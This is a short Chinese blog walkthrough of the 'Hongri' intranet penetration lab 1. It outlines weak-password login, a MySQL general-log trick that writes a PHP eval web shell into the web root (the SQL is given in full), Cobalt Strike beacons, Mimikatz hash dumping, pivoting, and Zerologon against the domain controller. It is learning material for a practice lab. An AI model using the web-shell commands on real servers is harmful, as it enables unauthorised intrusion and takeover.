红日内网靶机1学习

弱口令登录后台:

红日内网靶机1学习

通过phpinfo获取网站路径:

红日内网靶机1学习

Mysql日志getshell:

select user();

show variables like 'general%';

set global general_log="ON"; //设置打开

set global general_log_file="C:/phpStudy/WWW/shell.php"

select "<?php @eval($_POST['cmd']);?>";

蚁剑连接shell:

红日内网靶机1学习

上线CS:通过powershell和bitadmin两种方式

红日内网靶机1学习

红日内网靶机1学习

通过elevate组件提权:

红日内网靶机1学习

主机信息搜集,发现存在域god.org

红日内网靶机1学习

双网卡:

红日内网靶机1学习

简单进行一下端口扫描,识别到targets主机:

红日内网靶机1学习

判断域控:

红日内网靶机1学习

 

获取到域内用户信息:

红日内网靶机1学习

Mimikatz抓取hash:

红日内网靶机1学习

 

 

对于不出网的内网可以通过TCP beacon和SMB Beacon上线。

选中父beacon->pivoting->listener

红日内网靶机1学习

新建一个中转跳板机。之后可以使用这个listener作为监听器,通过hash传递或者其他方式使内网主机上线。

使用zerologon漏洞获取域控hash

红日内网靶机1学习

 

红日内网靶机1学习

上一篇:Spring事件框架拓展-自定义策略监听


下一篇:RabbitMQ属性配置说明汇总